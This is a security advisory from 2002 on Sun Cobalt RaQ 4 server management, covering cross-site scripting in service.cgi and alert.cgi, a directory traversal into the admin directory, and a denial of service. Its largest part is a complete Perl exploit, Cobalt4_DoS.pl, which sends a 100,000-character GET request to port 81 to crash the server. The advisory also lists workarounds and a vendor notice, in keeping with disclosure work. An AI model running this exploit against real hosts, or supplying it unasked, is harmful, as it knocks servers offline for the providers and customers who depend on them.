------oOo---------------- Cobalt RAQ 4 Server Management, Cross Site Scripting , Directory Traversal & DoS Vulnerabilities. ------oOo---------------- Company Affected: www.cobalt.com & www.sun.com Version: RAQ 4 Server Management. Dowload: http://www.cobalt.com/products/raq/index.html OS Affected: Linux ALL, Solaris ALL. Author: ** Alex Hernandez ** Thanks all the people from Spain and Argentina. ** Special Greets: White-B, Pablo S0r, Paco Spain, G.Maggiotti. ----=[Brief Description]=------------ The Sun Cobalt RaQ is a server appliance for Internet Service Providers (ISPs). It can host up to 200 individual websites or it can be dedicated to a single medium or large customer. This versatility opens up tremendous opportunity for service provider to invest in a single piece of hardware while migrating business customers up to dedicated servers. ----=[Summary]=---------------------- Exist three vulnerabilities: a) Cross Site Scripting. b) Traversal vulnerabilities. c) Denial Of Service.(Exploit Released) Cobalt's service.cgi incorrectly handles the incoming search parses, incoming HTML tags or JavaScript will be included inside the result without them being filtered out for dangerous content. A similar problem occurs with the x.cgi's inclusion of malicious code inside the resulting title search. The cgi^s files is an open source .A security vulnerability in the product allows attackers to insert malicious content into existing web pages by exploiting the Cross-Site Scripting Vulnerability. Affected Files Cgi^s alert.cgi service.cgi Workaround: 1) Delete service.cgi from the system, or disable its possible execution. 2) Delete alert.cgi from the system, or disable its possible execution EXAMPLES:

Hello! LOCATION: COOKIES: TAG IMAGES: WRITE ON DOCUMENT: ------oOo-------- Traversal File configuration. Exploit: # Access file for /usr/admserv/html/.cobalt/admin/ (admin ) order allow,deny allow from all require user admin Authname CobaltRaQ Authtype Basic Directory by Default on server is: "/usr/admserv/html/.cobalt/admin" u can translate to any directory for capture restricted files or passwords and profiles the users. ------oOo-------- Denial Of service. Proof Of concept: Server crashes after sending a very long URL: Example: Crash system and the admin need restart the service!. ------oOo------------- Exploit Code DoS Cobalt4_DoS.pl ------oOo------------- #!/usr/bin/perl # # Simple script to send a long 'A^s' command to the server, # resulting in the server crashing. # # Cobalt RAQ DoS v4 proof-of-concept exploit. # By Alex Hernandez (C)2002. # # Thanks all the people from Spain and Argentina. # Special Greets: White-B, Pablo S0r, Paco Spain, G.Maggiotti. # # # Usage: perl -x Cobalt4_DoS.pl -s # # Example: # # perl -x Cobalt4_DoS.pl -s # # Crash was successful ! # use Getopt::Std; use IO::Socket; print("\nCobalt RAQ DoS v4.0 DoS exploit (c)2002.\n"); print("Alex Hernandez al3xhernandez\@ureach.com\n\n"); getopts('s:', \%args); if(!defined($args{s})){&usage;} ($serv,$port,$def,$num,$data,$buf,$in_addr,$paddr,$proto); $def = "A"; $num = "100000"; $data .= $def x $num; $serv = $args{s}; $port = 81;#maybe u define the port for diference of versions $buf = "GET /cgi-bin/.cobalt/alert/service.cgi?service=$data /HTTP/1.0\r\n\r\n"; $in_addr = (gethostbyname($serv))[4] || die("Error: $!\n"); $paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n"); $proto = getprotobyname('tcp') || die("Error: $!\n"); socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!"); connect(S, $paddr) ||die ("Error: $!"); select(S); $| = 1; select(STDOUT); print S "$buf"; print("\nCrash was successful !\n\n"); sub usage {die("\n\nUsage: perl -x $0 -s \n\n");} ------oOo------------------------------------ Vendor Response: The vendor was notified Posted List^s Security cobalt: cobalt-securityat_private & jlovellat_private http://www.cobalt.com Patch Temporary: Delete files cgi^s from the system, or disable its possible execution. Alex Hernandez (c) 2002. ------oOo------------------------------------